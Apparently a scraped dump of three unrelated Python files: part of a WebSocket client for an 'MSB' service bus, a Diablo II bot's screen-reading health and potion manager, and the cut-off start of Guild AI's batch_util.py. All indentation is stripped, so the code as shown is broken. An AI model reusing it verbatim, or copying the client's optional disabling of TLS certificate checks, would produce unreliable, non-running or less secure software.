"IO_CONNECTED",
"IO_REGISTERED",
"IO_PUBLISHED",
"NIO_ALREADY_CONNECTED",
"NIO_REGISTRATION_ERROR",
"NIO_UNEXPECTED_REGISTRATION_ERROR",
"NIO_UNAUTHORIZED_CONNECTION",
"NIO_EVENT_FORWARDING_ERROR",
"NIO_UNEXPECTED_EVENT_FORWARDING_ERROR",
"ping"
]
def sendBuf(self):
for idx, msg in enumerate(self.eventCache):
try:
if self.connected and self.registered:
logging.debug("SENDING (BUF): " + msg)
if self.sockJsFraming:
_msg = self.objectToJson(msg).replace("\\n", "")
self.ws.send('["E ' + _msg[1:-1] + '"]')
else:
self.ws.send("E " + msg)
self.eventCache.pop(idx)
except Exception:
pass
def on_message(self, message):
if self.sockJsFraming:
if self.debug and message.startswith("h"):
logging.debug("♥")
message = message[3:-2]
if message in self.MSBMessageTypes:
logging.info(message)
if message == "IO_CONNECTED":
if self.reconnecting:
self.reconnecting = False
if self.sockJsFraming:
_selfd = json.dumps(
self.objectToJson(self.getSelfDescription())
).replace("\\n", "")
self.ws.send('["R ' + _selfd[1:-1] + '"]')
else:
self.ws.send(
"R " + self.objectToJson(self.getSelfDescription())
)
if message == "IO_REGISTERED":
self.registered = True
if self.eventCacheEnabled:
self.connected = True
self.sendBuf()
elif message == "NIO_ALREADY_CONNECTED":
if self.connected:
try:
self.ws.close()
except Exception:
pass
elif message == "NIO_UNEXPECTED_REGISTRATION_ERROR":
if self.connected:
try:
self.ws.close()
except Exception:
pass
elif message == "NIO_UNAUTHORIZED_CONNECTION":
if self.connected:
try:
self.ws.close()
except Exception:
pass
elif message == 'ping':
if self.sockJsFraming:
self.ws.send('["pong"]')
else:
self.ws.send('pong')
if message.startswith("C"):
jmsg = message.replace('\\"', '"')
jmsg = json.loads(jmsg[2:])
logging.info(str(jmsg))
if jmsg["functionId"] not in self.functions:
if jmsg["functionId"].startswith("/") and not jmsg[
"functionId"
].startswith("//"):
jmsg["functionId"] = jmsg["functionId"][1:]
if jmsg["functionId"] in self.functions:
if "correlationId" in jmsg:
jmsg["functionParameters"]["correlationId"] = jmsg["correlationId"]
else:
logging.debug("correlationid could not be found. Does the websocket interface version support it?")
self.functions[jmsg["functionId"]].implementation(
jmsg["functionParameters"]
)
else:
logging.warning("Function could not be found: " + jmsg["functionId"])
elif message.startswith("K"):
jmsg = message.replace('\\"', '"')
jmsg = json.loads(jmsg[2:])
logging.info(str(jmsg))
logging.debug("CONFIGURATION: " + str(jmsg))
if jmsg["uuid"] == self.uuid:
for key in jmsg["params"]:
if key in self.configuration["parameters"]:
self.changeConfigParameter(key, jmsg["params"][key])
self.reRegister()
def on_error(self, error):
logging.error(error)
def on_close(self, code, reason):
logging.debug("DISCONNECTED")
logging.debug("Websocket Close Status Code: (" + str(code) + "); Reason: ("+ str(reason) + ")")
self.connected = False
self.registered = False
if self.autoReconnect and not self.userDisconnect:
logging.info(
"### closed, waiting "
+ str(self.reconnectInterval)
+ " seconds before reconnect. ###"
)
time.sleep(self.reconnectInterval)
self.reconnecting = True
logging.info("Start reconnecting to msb url: >" + self.msb_url + "<")
self.connect(self.msb_url)
def on_open(self):
logging.debug("Socket open")
self.connected = True
def enableDebug(self, debug=True):
"""Enables or disables the debug logging for the msb client.
Args:
debug (bool): Used to either enable (true) or disable (false) debug logging.
"""
if debug:
logging.basicConfig(
format="[%(asctime)s] %(module)s %(name)s.%(funcName)s"
+ " +%(lineno)s: %(levelname)-8s [%(process)d] %(message)s"
)
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.basicConfig(format="[%(asctime)s] %(message)s")
logging.getLogger().setLevel(logging.INFO)
self.debug = debug
def enableTrace(self, trace=True):
"""Enables or disables the websocket trace.
Args:
trace (bool): Used to either enable (true) or disable (false) websocket trace
"""
self.trace = trace
websocket.enableTrace(trace)
def enableDataFormatValidation(self, dataFormatValidation=True):
"""Enables or disables data format and message format validation.
(Mainly for development, can be disabled in production to improve performance)
Args:
dataFormatValidation (bool): Used to either enable (true) or disable (false) format validation
"""
self.dataFormatValidation = dataFormatValidation
def disableAutoReconnect(self, autoReconnect=True):
"""Disables or enables auto reconnect for the client if connection to MSB gets lost.
Args:
autoReconnect (bool): Used to either disable (true) or enable (false) auto reconnect
"""
self.autoReconnect = not autoReconnect
def setReconnectInterval(self, interval=10000):
"""Set the interval in ms for automatic reconnects if connection to MSB gets lost.
Args:
interval (int): The interval value in ms (>=3000) for automatic reconnections
"""
if interval <= 3000:
interval = 3000
self.reconnectInterval = interval / 1000
def setKeepAlive(self, keepAlive=True, heartbeat_interval=8000):
"""Sets the keepalive interval for the client-side heartbeat in ms for the WS connection.
This is required if there is no server-side heartbeat.
Args:
keepAlive (bool): Used to enable (true) or disable (false) the keep alive functionality
heartbeat_interval (int): Client-side heartbeat interval value in ms
"""
self.keepAlive = keepAlive
if heartbeat_interval < 8000:
heartbeat_interval = 8000
self.heartbeat_interval = heartbeat_interval / 1000
def disableSockJsFraming(self, sockJsFraming=True):
"""Disables or enables the sockJs framing.
Args:
sockJsFraming (bool): Used to either disable (true) or enable (false) sockJs framing
"""
self.sockJsFraming = not sockJsFraming
def disableHostnameVerification(self, hostnameVerification=True):
"""Disables or enables checking for self-signed SSL certificates (disable it e.g. for development)
Args:
hostnameVerification (bool): Used to either disable (true) or enable (false) ssl checks
"""
self.hostnameVerification = not hostnameVerification
def disableEventCache(self, disableEventCache=True):
"""Disables or enables the event cache, which will save sent events if no active MSB connection is present.
Args:
disableEventCache (bool): Used to either disable (true) or enable (false) event cache
"""
self.eventCacheEnabled = not disableEventCache
def setEventCacheSize(self, eventCacheSize=1000):
"""Sets the size (max number of events) of the event cahe.
If the max is reached, oldest entry gets dismissed.
Args:
eventCacheSize (int): The size of the event cache (event entries)
"""
self.eventCacheSize = eventCacheSize
def enableThreadAsDaemon(self, threadAsDaemonEnabled=True):
"""Enable the msb client thread to run as daemon.
This will run the websocket thread as daemon to be independet from the user threads.
Args:
threadAsDaemonEnabled (bool): Used to either enable (true) or disable (false) the thread to run as daemon
"""
self.threadAsDaemonEnabled = threadAsDaemonEnabled
def _checkUrl(self, msb_url=None):
"""Checks and transforms the msb url into a valid websocket format
Args:
msb_url (str): The url of the MSB (http(s)://host:port or ws(s)://host:port)
"""
server_id = str(randint(100, 999))
session_id = str(uuid.uuid4()).replace("-", "")
if msb_url is not None:
self.msb_url = msb_url
if "http://" in self.msb_url:
self.msb_url = self.msb_url.replace("http://", "ws://")
elif "https://" in self.msb_url:
self.msb_url = self.msb_url.replace("https://", "wss://")
if not (self.msb_url.startswith("ws://") or self.msb_url.startswith("wss://")):
logging.error("WRONG MSB URL FORMAT: " + str(self.msb_url))
if self.sockJsFraming:
self.msb_url_with_wspath = (
self.msb_url
+ "/websocket/data/"
+ server_id
+ "/"
+ session_id
+ "/websocket"
)
else:
self.msb_url_with_wspath = self.msb_url + "/websocket/data/websocket"
def connect(self, msb_url=None):
"""Connects the client to the MSB WebSocket interface.
Args:
msb_url (str): The url of the MSB (http(s)://host:port or ws(s)://host:port)
"""
self.userDisconnect = False
# check and update the url fromat
self._checkUrl(msb_url)
# init the websocket app and register own listeners
ws = websocket.WebSocketApp(
self.msb_url_with_wspath,
on_message=self.on_message,
on_error=self.on_error,
on_close=self.on_close,
)
self.ws = ws
ws.on_open = self.on_open
# prepare and start socket
def runf():
try:
if not self.hostnameVerification:
if self.keepAlive:
ws.run_forever(
ping_interval=self.heartbeat_interval,
ping_timeout=self.heartbeat_interval - 5,
sslopt={
"cert_reqs": ssl.CERT_NONE,
"check_hostname": False,
},
suppress_origin=True
)
else:
ws.run_forever(
sslopt={
"cert_reqs": ssl.CERT_NONE,
"check_hostname": False,
},
suppress_origin=True
)
else:
if self.keepAlive:
ws.run_forever(
ping_interval=self.heartbeat_interval,
ping_timeout=self.heartbeat_interval - 3,
)
else:
ws.run_forever()
except Exception:
pass
logging.info("Connecting to MSB @ " + self.msb_url)
wst = threading.Thread(target=runf)
if self.threadAsDaemonEnabled:
wst.setDaemon(True)
wst.start()
def disconnect(self):
"""Disconnects the client from the MSB WebSocket interface."""
self.userDisconnect = True
logging.debug("Disconnect requested by msb client api")
self.ws.close()
def register(self):
"""Sends registration message to the MSB."""
def _sendReg():
if self.sockJsFraming:
_selfd = json.dumps(
self.objectToJson(self.getSelfDescription())
).replace("\\n", "")
_selfd = _selfd[1:-1]
self.ws.send('["R ' + _selfd + '"]')
else:
self.ws.send("R " + self.objectToJson(self.getSelfDescription()))
def _set_interval(func, sec):
def func_wrapper():
if self.connected:
func()
else:
_set_interval(func, sec)
t = threading.Timer(sec, func_wrapper)
t.start()
return t
_set_interval(_sendReg, 0.1)
def addEvent(
self,
event,
event_name=None,
event_description=None,
event_dataformat=None,
event_priority=0,
isArray=None,
):
"""Adds an event to the self-description.
Args:
event (:obj:Event, str): The event object or the event id
event_name (str): The name of the event
event_description (str): The description of the event
event_dataFormat (:obj:): The data type of the event (of class DataFormat, DataType or ComplexDataFormat)
event_priority (str, int): The priority of the event (LOW,MEDIUM,HIGH) or (0,1,2)
isArray (bool): Specifies if the event handles an object array or just an object of the data
"""
# create event object by single params
if not isinstance(event, Event):
event = Event(
event,
event_name,
event_description,
event_dataformat,
event_priority,
isArray,
)
# for complex objects, update dataformat
if event.dataFormat is not None:
# if array of complex objects, change dataformat to type array
if event.isArray:
if "$ref" in event.dataFormat["dataObject"]:
event.dataFormat["dataObject"]["type"] = "array"
event.dataFormat["dataObject"]["items"] = {}
event.dataFormat["dataObject"]["items"]["$ref"] = {}
event.dataFormat["dataObject"]["items"][
"$ref"
] = event.dataFormat["dataObject"]["$ref"]
del event.dataFormat["dataObject"]["$ref"]
# if not an array of complex objects, change dataformat to type object
elif not event.isArray:
if "$ref" in event.dataFormat["dataObject"]:
event.dataFormat["dataObject"]["type"] = "object"
# logging.debug(str(event.dataFormat))
# validate data format and add event
if vadilateEventDataFormat(event.dataFormat):
event.id = len(self.events) + 1
if event.eventId not in self.events:
self.events[event.eventId] = event
else:
logging.error(
str(event.eventId) + " already in events, change event id!"
)
raise Exception("Event with this ID already present: " + str(event.eventId))
def addFunction(
self,
function,
function_name=None,
function_description=None,
function_dataformat=None,
fnpointer=None,
isArray=False,
responseEvents=None,
):
"""Adds a function to the self-description.
Args:
function (:obj:Function, str): The function object ot the function id
function_name (str): The name of the function
function_description (str): The description of the function
function_dataformat (:obj:): The data type of the function (of class DataFormat or ComplexDataFormat)
fnpointer (:func:): The function implementation to be called for incoming events
isArray (bool): Specifies if the function handles an object array or just an object of the data
responseEvents (:obj: list of event ids): The list of event IDs to be send as response events
"""
# create function object by single params
if not isinstance(function, Function):
function = Function(
function,
function_name,
function_description,
function_dataformat,
fnpointer,
isArray,
responseEvents,
)
# check if defined reponseEvents are valid (exist)
if function.responseEvents is not None:
for responseEvent in function.responseEvents:
if responseEvent not in self.events:
logging.error(
"Event not found for id " + responseEvent
)
raise Exception("Event not found for id " + responseEvent)
# for complex objects, update dataformat
if function.dataFormat is not None:
# if array of complex objects, change dataformat to type array
if function.isArray:
if "$ref" in function.dataFormat["dataObject"]:
function.dataFormat["dataObject"]["type"] = "array"
function.dataFormat["dataObject"]["items"] = {}
function.dataFormat["dataObject"]["items"]["$ref"] = {}
function.dataFormat["dataObject"]["items"][
"$ref"
] = function.dataFormat["dataObject"]["$ref"]
del function.dataFormat["dataObject"]["$ref"]
# if not and array of complex objects, change dataformat to type object
elif not function.isArray:
if "$ref" in function.dataFormat["dataObject"]:
function.dataFormat["dataObject"]["type"] = "object"
# logging.debug(str(function.dataFormat))
# validate data format and add function
if vadilateFunctionDataFormat(function.dataFormat):
if function.functionId not in self.functions:
self.functions[function.functionId] = function
else:
logging.error(
str(function.functionId)
+ " already in functions, change function id!"
)
raise Exception("Function with this ID already present: " + str(function.functionId))
def setEventValue(self, eventId, eventValue):
"""Sets the value for an event
Args:
eventId (str): The event id
eventValue (str): The value of the event
"""
if eventId in self.events:
self.events[eventId].dataObject = eventValue
def publish(
self,
eventId,
dataObject=None,
priority=None,
cached=False,
postDate=None,
correlationId=None,
):
"""This function sends the event of the provided event ID.
Optionally the value can be provided, otherwise the last set value will be used.
The priority can also be set, otherwise the standard value for the event's priority will be used.
A postDate can be optionally provided, otherwise the current timestamp will be used.
Args:
eventId (str): The event id
dataObject (:obj:): The value to be published
priority (str, int): The priority of the event (LOW,MEDIUM,HIGH) or (0,1,2)
cached (bool): Specifies wether this event will be added to cache if MSB is currently not reachable
postDate (datetime): the post date of the event (e.g. datetime.datetime.utcnow().isoformat()[:-3] + "Z")
correlationId (str): The correlation id of the event used to idetify events in multi-step flows
"""
event = {}
event["uuid"] = self.uuid
event["eventId"] = eventId
# upfate the event value
if dataObject is not None:
self.events[eventId].dataObject = dataObject
event["dataObject"] = self.events[eventId].dataObject
if priority is not None:
self.events[eventId].priority = priority
event["priority"] = self.events[eventId].priority
if postDate is None:
event["postDate"] = datetime.datetime.utcnow().isoformat()[:-3] + "Z"
if correlationId is not None:
event["correlationId"] = correlationId
# validate event value
if self.dataFormatValidation and dataObject is not None:
self.validateValueForDataFormat(
event["dataObject"],
self.events[eventId].df,
self.events[eventId].dataFormat,
self.events[eventId].isArray,
)
msg = self.objectToJson(event)
# send event
if self.connected and self.registered:
try:
if self.sockJsFraming:
_msg = self.objectToJson(msg).replace("\\n", "")
self.ws.send('["E ' + _msg[1:-1] + '"]')
else:
self.ws.send("E " + msg)
logging.debug("SENDING: " + msg)
except Exception:
logging.exception(self, "Error, could not send message...")
pass
else:
# or cache event if not connected
if self.eventCacheEnabled and cached:
logging.debug(
"Not connected and/or registered, putting event in cache."
)
if len(self.eventCache) < self.eventCacheSize:
self.eventCache.append(msg)
else:
self.eventCache.pop(0)
self.eventCache.append(msg)
elif cached and not self.eventCacheEnabled:
logging.debug(
"Global cache disabled, message cache flag overridden and discarded."
)
else:
logging.debug("Caching disabled, message discarded.")
@staticmethod
def validateValueForDataFormat(value, df, dataFormat, isArray):
"""Validate the event value to match the specified data format
Args:
value (:obj:): The value of the event to be validated
df (:obj:): The (short) data format of the event
dataFormat (:obj:): The (complex) data format of the event
isArray (bool): Specifies wether this event will be added to cache if MSB is currently not reachable
"""
if isinstance(df, ComplexDataFormat):
if validateValueForComplexDataformat(
value,
dataFormat,
isArray,
):
return True
else:
return False
else:
if validateValueForSimpleDataformat(
value,
df,
isArray,
):
return True
else:
return False
def addConfigParameter(self, key, value, type):
"""Add a new configuration parameter to the client.
Configuration parameters can be used to change client behaviour ny changing its values via MSB GUI.
Args:
key (str): The key (name) of the configuration parameter
value (:obj:): The initial value of the configuration parameter
type (:obj:DataType): The simple data format of the confituration parameter
"""
newParam = getDataType(type)
newParam["type"] = newParam["type"].upper()
if "format" in newParam:
newParam["format"] = newParam["format"].upper()
newParam["value"] = value
self.configuration["parameters"][key] = newParam
def getConfigParameter(self, key):
"""Get the value of a configuration parameter.
Args:
key (str): The key (name) of the configuration parameter
"""
if key in self.configuration["parameters"]:
return self.configuration["parameters"][key]["value"]
else:
logging.warning(
"Cannot get config param for unknown key: " + str(key)
)
raise Exception("Cannot get config param for unknown key: " + str(key))
def changeConfigParameter(self, key, value):
"""Change the value of a configuration parameter.
Args:
key (str): The key (name) of the configuration parameter
value (:obj:): The new value of the configuration parameter
"""
if key in self.configuration["parameters"]:
oldValue = self.configuration["parameters"][key]["value"]
if oldValue != value:
self.configuration["parameters"][key]["value"] = value
if self.connected and self.registered:
self.reRegister()
else:
logging.warning(
"Cannot change config param. Value is already set!"
)
else:
logging.warning(
"Cannot change config param for unknown key: " + str(key)
)
def reRegister(self):
"""Performs a new registration to update the self-description on MSB."""
logging.debug("Reregistering after configuration parameter change...")
if self.sockJsFraming:
_selfd = json.dumps(self.objectToJson(self.getSelfDescription())).replace(
"\\n", ""
)
self.ws.send('["R ' + _selfd[1:-1] + '"]')
else:
self.ws.send("R " + self.objectToJson(self.getSelfDescription()))
def objectToJson(self, object):
"""Converts a python object into a json ovject.
Returns:
json object: The resulting json object
"""
return jsonpickle.encode(object, unpicklable=False)
def getSelfDescription(self):
"""Generate the self description JSON object of the application or smart object."""
self_description = {}
self_description["@class"] = self.service_type
self_description["uuid"] = self.uuid
self_description["name"] = self.name
self_description["description"] = self.description
self_description["token"] = self.token
_ev = []
e_props = ["@id", "id", "dataFormat", "description", "eventId", "name"]
for event in self.events:
current_e_props = []
e = jsonpickle.decode(
jsonpickle.encode(self.events[event], unpicklable=False)
)
for key in e.keys():
if key == "id":
e["@id"] = e["id"]
del e[key]
del e["priority"]
del e["df"]
if e["dataFormat"] is None:
del e["dataFormat"]
del e["isArray"]
for key in e.keys():
current_e_props.append(key)
for key in current_e_props:
if key not in e_props:
# logging.warning(self, 'Remove key from event if invalid in self description: ' + key)
try:
del e[key]
except Exception:
logging.exception(self, "Key not found: " + key)
_ev.append(e)
self_description["events"] = _ev
_fu = []
for function in self.functions:
f = jsonpickle.decode(
jsonpickle.encode(self.functions[function], unpicklable=False)
)
if f["responseEvents"] and len(f["responseEvents"]) > 0:
_re = []
for idx, re in enumerate(f["responseEvents"]):
_re.append(self.events[re].id)
f["responseEvents"] = _re
else:
del f["responseEvents"]
del f["isArray"]
if "implementation" in f:
del f["implementation"]
if f["dataFormat"] is None:
del f["dataFormat"]
_fu.append(f)
self_description["functions"] = _fu
self_description["configuration"] = self.configuration
return self_description
def readConfig(self):
"""Helper function to parse main configuration param by param name from the application.properties file"""
logging.info("Reading configuration from application.properties file")
config = None
if self.applicationPropertiesCustomPath is None:
config = open("application.properties", "r")
else:
config = open(str(self.applicationPropertiesCustomPath), "r")
if config is not None:
for line in config:
configparam = line.split("=")
if configparam[0] == "msb.type":
self.service_type = configparam[1].rstrip()
elif configparam[0] == "msb.name":
self.name = configparam[1].rstrip()
elif configparam[0] == "msb.uuid":
self.uuid = configparam[1].rstrip()
elif configparam[0] == "msb.token":
self.token = configparam[1].rstrip()
elif configparam[0] == "msb.url":
self.msb_url = configparam[1].rstrip()
elif configparam[0] == "msb.description":
self.description = configparam[1].rstrip()
def vadilateEventDataFormat(df):
"""Validates the specified dataformat of an event by using a json schema
Args:
df (:obj:): The data format specified for the event
"""
if df is None:
return True
schema_file = os.path.join(os.path.dirname(__file__), "event_schema.json")
schema = json.loads(open(schema_file).read())
do = {"definitions": json.loads(jsonpickle.encode(df))}
try:
jsonschema.Draft4Validator(schema).validate(do)
except Exception as e:
logging.exception(e)
return False
return True
def vadilateFunctionDataFormat(df):
"""Validates the specified dataformat of a function by using a json schema
Args:
df (:obj:): The data format specified for the function
"""
if df is None:
return True
schema_file = os.path.join(os.path.dirname(__file__), "function_schema.json")
schema = json.loads(open(schema_file).read())
do = {"definitions": json.loads(jsonpickle.encode(df))}
try:
jsonschema.Draft4Validator(schema).validate(do)
except Exception as e:
logging.exception(e)
return False
return True
def validateValueForComplexDataformat(value, dataFormat, isArray):
"""Validate the event value to match the specified complex data format
Args:
value (:obj:): The value of the event to be validated
dataFormat (:obj:): The (complex) data format of the event
isArray (bool): Specifies wether this event will be added to cache if MSB is currently not reachable
"""
schema = {}
if isArray:
schema["items"] = {}
schema["items"]["$ref"] = dataFormat["dataObject"]["items"]["$ref"]
schema["type"] = "array"
else:
schema["$ref"] = {}
schema["$ref"] = dataFormat["dataObject"]["$ref"]
schema["type"] = "object"
schema["definitions"] = dataFormat
try:
jsonschema.validate(
value,
schema,
format_checker=jsonschema.FormatChecker(),
)
return True
except Exception as e:
logging.error(
"Error validating event: "
+ str(e)
)
return False
def validateValueForSimpleDataformat(value, df, isArray):
"""Validate the event value to match the specified simple data format
Args:
value (:obj:): The value of the event to be validated
df (:obj:): The (short) data format of the event
isArray (bool): Specifies wether this event will be added to cache if MSB is currently not reachable
"""
if isArray:
try:
if all((type(item) == df) for item in value):
return True
else:
logging.error(
"Error validating event: "
+ "Value in list doesn't fit the required data format: "
+ str(value)
+ ", expected all items to be: "
+ str(df)
)
return False
except Exception:
logging.error(
"Error validating event: "
+ "Value ("
+ str(value)
+ ") is not an array as defined."
)
return False
else:
if type(value) == df:
return True
logging.error(
"Error validating event: "
+ "Value doesn't fit the required data format: "
+ str(value)
+ " = "
+ str(type(value))
+ ", expected: "
+ str(df)
)
return False
|
health_manager.py
|
from template_finder import TemplateFinder
from ui import UiManager
from ui import BeltManager
from pather import Location
import cv2
import time
import keyboard
from utils.custom_mouse import mouse
from utils.misc import cut_roi, color_filter, wait
from logger import Logger
from screen import Screen
import numpy as np
import time
from config import Config
class HealthManager:
def __init__(self, screen: Screen, template_finder: TemplateFinder):
self._config = Config()
self._screen = screen
self._template_finder = template_finder
self._ui_manager = UiManager(screen, self._template_finder)
self._belt_manager = None # must be set with the belt manager form bot.py
self._do_monitor = False
self._did_chicken = False
self._last_rejuv = time.time()
self._last_health = time.time()
self._last_mana = time.time()
self._last_merc_healh = time.time()
self._callback = None
self._pausing = True
self._last_chicken_screenshot = None
def stop_monitor(self):
self._do_monitor = False
def set_belt_manager(self, belt_manager: BeltManager):
self._belt_manager = belt_manager
def set_callback(self, callback):
self._callback = callback
def did_chicken(self):
return self._did_chicken
def reset_chicken_flag(self):
self._did_chicken = False
self._pausing = True
def update_location(self, loc: Location):
if loc is not None and type(loc) == str:
bosses = ["shenk", "eldritch", "pindle", "nihlatak", "trav", "arc", "diablo"]
prev_value = self._pausing
self._pausing = not any(substring in loc for substring in bosses)
if self._pausing != prev_value:
debug_str = "pausing" if self._pausing else "active"
Logger.info(f"Health Manager is now {debug_str}")
@staticmethod
def get_health(config: Config, img: np.ndarray) -> float:
health_rec = [config.ui_pos["health_left"], config.ui_pos["health_top"], config.ui_pos["health_width"], config.ui_pos["health_height"]]
health_img = cut_roi(img, health_rec)
# red mask
mask1, _ = color_filter(health_img, [np.array([0, 110, 20]), np.array([2, 255, 255])])
mask2, _ = color_filter(health_img, [np.array([178, 110, 20]), np.array([180, 255, 255])])
mask = cv2.bitwise_or(mask1, mask2)
health_percentage = (float(np.sum(mask)) / mask.size) * (1/255.0)
# green (in case of poison)
mask, _ = color_filter(health_img, [np.array([47, 90, 20]), np.array([54, 255, 255])])
health_percentage_green = (float(np.sum(mask)) / mask.size) * (1/255.0)
return max(health_percentage, health_percentage_green)
@staticmethod
def get_mana(config: Config, img: np.ndarray) -> float:
mana_rec = [config.ui_pos["mana_left"], config.ui_pos["mana_top"], config.ui_pos["mana_width"], config.ui_pos["mana_height"]]
mana_img = cut_roi(img, mana_rec)
mask, _ = color_filter(mana_img, [np.array([117, 120, 20]), np.array([121, 255, 255])])
mana_percentage = (float(np.sum(mask)) / mask.size) * (1/255.0)
return mana_percentage
@staticmethod
def get_merc_health(config: Config, img: np.ndarray) -> float:
health_rec = [config.ui_pos["merc_health_left"], config.ui_pos["merc_health_top"], config.ui_pos["merc_health_width"], config.ui_pos["merc_health_height"]]
merc_health_img = cut_roi(img, health_rec)
merc_health_img = cv2.cvtColor(merc_health_img, cv2.COLOR_BGR2GRAY)
_, health_tresh = cv2.threshold(merc_health_img, 5, 255, cv2.THRESH_BINARY)
merc_health_percentage = (float(np.sum(health_tresh)) / health_tresh.size) * (1/255.0)
return merc_health_percentage
def _do_chicken(self, img):
if self._callback is not None:
self._callback()
self._callback = None
if self._config.general["info_screenshots"]:
self._last_chicken_screenshot = "./info_screenshots/info_debug_chicken_" + time.strftime("%Y%m%d_%H%M%S") + ".png"
cv2.imwrite(self._last_chicken_screenshot, img)
# clean up key presses that might be pressed in the run_thread
keyboard.release(self._config.char["stand_still"])
wait(0.02, 0.05)
keyboard.release(self._config.char["show_items"])
wait(0.02, 0.05)
mouse.release(button="left")
wait(0.02, 0.05)
mouse.release(button="right")
time.sleep(0.01)
self._ui_manager.save_and_exit(does_chicken=True)
self._did_chicken = True
self._pausing = True
def start_monitor(self):
Logger.info("Start health monitoring")
self._do_monitor = True
self._did_chicken = False
start = time.time()
while self._do_monitor:
time.sleep(0.1)
# Wait until the flag is reset by main.py
if self._did_chicken or self._pausing: continue
img = self._screen.grab()
# TODO: Check if in town or not! Otherwise risk endless chicken loop
ingame_template_match = self._template_finder.search("WINDOW_INGAME_OFFSET_REFERENCE", img, roi=self._config.ui_roi["window_ingame_ref"], threshold=0.9)
if ingame_template_match.valid:
health_percentage = self.get_health(self._config, img)
mana_percentage = self.get_mana(self._config, img)
# check rejuv
success_drink_rejuv = False
last_drink = time.time() - self._last_rejuv
if (health_percentage < self._config.char["take_rejuv_potion_health"] and last_drink > 1) or \
(mana_percentage < self._config.char["take_rejuv_potion_mana"] and last_drink > 2):
success_drink_rejuv = self._belt_manager.drink_potion("rejuv", stats=[health_percentage, mana_percentage])
self._last_rejuv = time.time()
# in case no rejuv was used, check for chicken, health pot and mana pot usage
if not success_drink_rejuv:
# check health
last_drink = time.time() - self._last_health
if health_percentage < self._config.char["take_health_potion"] and last_drink > 3.5:
self._belt_manager.drink_potion("health", stats=[health_percentage, mana_percentage])
self._last_health = time.time()
# give the chicken a 6 sec delay to give time for a healing pot and avoid endless loop of chicken
elif health_percentage < self._config.char["chicken"] and (time.time() - start) > 6:
Logger.warning(f"Trying to chicken, player HP {(health_percentage*100):.1f}%!")
self._do_chicken(img)
# check mana
last_drink = time.time() - self._last_mana
if mana_percentage < self._config.char["take_mana_potion"] and last_drink > 4:
self._belt_manager.drink_potion("mana", stats=[health_percentage, mana_percentage])
self._last_mana = time.time()
# check merc
merc_alive = self._template_finder.search(["MERC_A2","MERC_A1","MERC_A5","MERC_A3"], img, roi=self._config.ui_roi["merc_icon"]).valid
if merc_alive:
merc_health_percentage = self.get_merc_health(self._config, img)
last_drink = time.time() - self._last_merc_healh
if merc_health_percentage < self._config.char["merc_chicken"]:
Logger.warning(f"Trying to chicken, merc HP {(merc_health_percentage*100):.1f}%!")
self._do_chicken(img)
if merc_health_percentage < self._config.char["heal_rejuv_merc"] and last_drink > 4.0:
self._belt_manager.drink_potion("rejuv", merc=True, stats=[merc_health_percentage])
self._last_merc_healh = time.time()
elif merc_health_percentage < self._config.char["heal_merc"] and last_drink > 7.0:
self._belt_manager.drink_potion("health", merc=True, stats=[merc_health_percentage])
self._last_merc_healh = time.time()
Logger.debug("Stop health monitoring")
# Testing: Start dying or lossing mana and see if it works
if __name__ == "__main__":
import threading
import keyboard
import os
keyboard.add_hotkey('f12', lambda: Logger.info('Exit Health Manager') or os._exit(1))
config = Config()
screen = Screen(config.general["monitor"])
template_finder = TemplateFinder(screen)
belt_manager = BeltManager(screen, template_finder)
manager = HealthManager(screen, template_finder)
manager.set_belt_manager(belt_manager)
manager._pausing = False
Logger.info("Press f12 to exit health manager")
health_monitor_thread = threading.Thread(target=manager.start_monitor)
health_monitor_thread.start()
while 1:
if manager.did_chicken():
manager.stop_monitor()
health_monitor_thread.join()
break
wait(0.5)
|
batch_util.py
|
# Copyright 2017-2022 RStudio, PBC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import csv
import json
import itertools
import logging
import os
import random
import signal
import threading
import six
from guild import _api as gapi
from guild import cli
from guild import exit_code
from guild import flag_util
from guild import lock as locklib
from guild import main
from guild import op_util
from guild import run_util
from guild import util
from guild import var
log = logging.getLogger("guild")
DEFAULT_MAX_TRIALS = 20
DEFAULT_OBJECTIVE = "loss"
RUN_STATUS_LOCK_TIMEOUT = 30
PREV_TRIALS_BATCH = "batch"
PREV_TRIALS_SOURCECODE = "sourcecode"
PREV_TRIALS_OPERATION = "operation"
__trial_running_lock = threading.Lock()
__batch_exiting = threading.Event()
class CurrentRunNotBatchError(Exception):
pass
class InvalidFlagFunctionArgs(Exception):
def __init__(self, name, args, flag_name, msg):
super(InvalidFlagFunctionArgs, self).__init__(msg)
self.function_name = name
self.function_args = args
self.flag_name = flag_name
###################################################################
# Handle trials - run, print, save
###################################################################
def handle_trials(batch_run, trials):
if os.getenv("PRINT_TRIALS_CMD") == "1":
_print_trials_cmd(batch_run, trials)
elif os.getenv("PRINT_TRIALS") == "1":
_print_trials(trials)
elif os.getenv("SAVE_TRIALS"):
_save_trials(trials, os.getenv("SAVE_TRIALS"))
else:
_run_trials(batch_run, trials)
def _print_trials_cmd(batch_run, trials):
from guild.commands import run_impl
for trial in trials:
with util.TempDir() as tmp:
run = init_trial_run(batch_run, trial, tmp.path)
run_impl.run(restart=run.dir, print_cmd=True)
def _print_trials(trials):
if trials:
data, cols = _trials_table_data(trials, format=True)
cli.table(data, cols)
def _trials_table_data(trials, format=False):
names = set()
data = []
maybe_format = flag_util.encode_flag_val if format else lambda x: x
for i, flags in enumerate(trials):
row = {"_trial": i + 1}
data.append(row)
if flags:
row.update({name: maybe_format(flags[name]) for name in flags})
names.update(flags)
heading = {name: name for name in names}
heading["_trial"] = "#"
return [heading] + data, ["_trial"] + sorted(names)
def _save_trials(trials, path):
_root, ext = os.path.splitext(path)
if ext.lower() == ".json":
_save_trials_json(trials, path)
else:
assert ext.lower() in (".csv", ""), "unsupported extension in path '%s'" % path
_save_trials_csv(trials, path)
def _save_trials_json(trials, path):
data, _cols = _trials_table_data(trials, format=False)
with open(path, "w") as f:
json.dump(_strip_trial_nums(data[1:]), f, sort_keys=True)
def _strip_trial_nums(data):
return [{name: row[name] for name in row if name != "_trial"} for row in data]
def _save_trials_csv(trials, path):
data, cols = _trials_table_data(trials, format=True)
with open(path, "w") as f:
out = csv.writer(f, lineterminator="\n")
for row in data:
row_vals = [row.get(name, "") for name in cols if name != "_trial"]
